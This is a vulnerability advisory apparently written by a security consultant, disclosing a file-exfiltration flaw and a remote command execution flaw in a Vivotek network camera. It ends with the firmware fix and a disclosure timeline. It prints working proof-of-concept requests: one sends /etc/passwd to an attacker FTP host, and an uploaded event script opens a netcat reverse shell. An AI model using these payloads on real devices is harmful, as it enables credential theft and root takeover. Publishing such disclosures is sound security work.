Multiple Vulnerabilities in Vivotek Camera

Author: Mike Manzotti – Senior Consultant In a recent security engagement Vivotek Camera IT9388-HT (firmware version: 0100p) was found to be vulnerable to arbitrary file download (CVE-2020-11949) and remote command execution (CVE-2020-11950). Vivotek Camera IT9388-HT is a weatherproof network camera for surveillance and CCTV networks which comes with motion, tamper detection and infrared illumination. Under the hood, it’s a Linux system based on the ARM architecture and the configuration settings are made via a web interface, which is pretty common for an IoT (Internet of things) device.

Arbitrary File Download: CVE-2020-11949

The Vivotek camera allows an authenticated user to schedule tasks which can be triggered at a certain time or when an event happens via the motion or tamper detection controls. The scheduled tasks can be created via the web interface or by uploading a script file. The web interface allows the user to specify a system log file and an external FTP server, and then permits the user to test the configuration by sending a test file to the specified FTP server. However, a malicious user can force the camera to send any local file to a malicious user’s FTP server. As a proof of concept example, the following request forces the camera to send the “/etc/passwd” file to the attacker’s FTP server:

POST http://<CAMERA_IP>/cgi-bin/admin/testserver.cgi
type=ftp&address=<ATTACKER_IP>+.+/etc/passwd+#&username=anonymous&port=21&sslmode=&passive=1&url=&location=ls&senderemail=&recipientemail=&workgroup=&groupidx=0

The following output shows the file was successfully received by the attacker’s FTP server:

$ python -m pyftpdlib -p 21 -w
[I 2020-02-18 22:24:07] [MASKED]:58474-[] FTP session opened (connect)
[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] USER 'anonymous' logged in.
[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] CWD /root/Scans 250
[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] STOR /root/Scans/passwd completed=1 bytes=234 seconds=0.012
[I 2020-02-18 22:24:07] [MASKED]:14:58474-[anonymous] FTP session closed (disconnect).
^C[I 2020-02-18 22:24:10] received interrupt signal
[I 2020-02-18 22:24:10] >>> shutting down FTP server, 1 socket(s), pid=452478 <<<

With this vulnerability an attacker could gain access to the “/etc/passwd” file of the camera containing password hashes:

$ cat passwd
root:$1$iC$To**********************************6:/mnt/ramdisk:/bin/sh
tmis:x:9999:9999:Linux User,,,:/home/tmis:/bin/sh
viewer:$1$kD$***********************************7:/tmp:/bin/bash

Limitations An attacker would need to reach the Vivotek camera’s web interface and have authenticated access. Below is proof of concept video showing the exploitation process:

Remote Command Execution: CVE-2020-11950

The Vivotek camera web interface allows a user to create scheduled tasks as discussed previously. The scheduled tasks can be created via the web interface or uploading a script file. However, a malicious web user can abuse the upload functionality to upload a script file which, once triggered, will force the camera to execute operating system commands. As a proof of concept example, the following script file connects to a specified server and spawns a remote command and control session via “sh”:

POST http://<CAMERA_IP>/cgi-bin/admin/eventscript.cgi 
[…]
<?xml version="1.0" encoding="UTF-8"?>
<eventmgr version="0101">
<maxprocess>1</maxprocess>
<schedule id="0">
<duration>
<weekday>1-5</weekday>
<time>00:00:00-23:59:59</time>
</duration>
</schedule>
<event id="0">
<description>RCE Test</description>
<condition></condition>
<delay>1</delay>
<process>
/usr/bin/nc <ATTACKER_IP> 80 -e /bin/sh
</process>
<priority>10</priority>
</event>
</eventmgr>
[…]

As soon as the file script is uploaded, the attacker can interact with the generated session as shown below:

$ nc -lvp 80
listening on [any] 80 ...
[MASKED]: inverse host lookup failed: Unknown host
connect to [MASKED] from (UNKNOWN) [MASKED] 45179
id
uid=0(root) gid=0(root)

Limitations An attacker would need to reach the Vivotek camera’s web interface and have authenticated access. Below is proof of concept video showing the exploitation process:  

Mitigation

The vulnerabilities have been disclosed with the vendor who has released a new firmware version 1.2001.13.01a that fixes both issues. It’s worth noting that Vivotek were very helpful and responsive during our communication and were keen to address these vulnerabilities quickly. Below is the vulnerability disclosure timeline:  

Date	Action
03/03/2020	Details of both vulnerabilities have been emailed to the vendor at [email protected].
04/03/2020	Vendor response acknowledged the vulnerabilities and an internal ticket was raised.
12/03/2020	Dionach asked for an update.
13/03/2020	Vendor said they were working on a firmware update.
06/04/2020	Vendor confirmed that the new firmware will be ready for testing on the week commencing 17/03.
20/04/2020	Vendor provided the new firmware. Dionach confirmed the vulnerabilities are now fixed.
21/04/2020	CVE numbers have been allocated. Vendor stated that in middle of June all cameras firmware will be released.
26/05/2020	Firmware updates have been released (VVTK-SA-2020-001).
25/06/2020	CVE-2020-11949 and CVE-2020-11950 have been publicly disclosed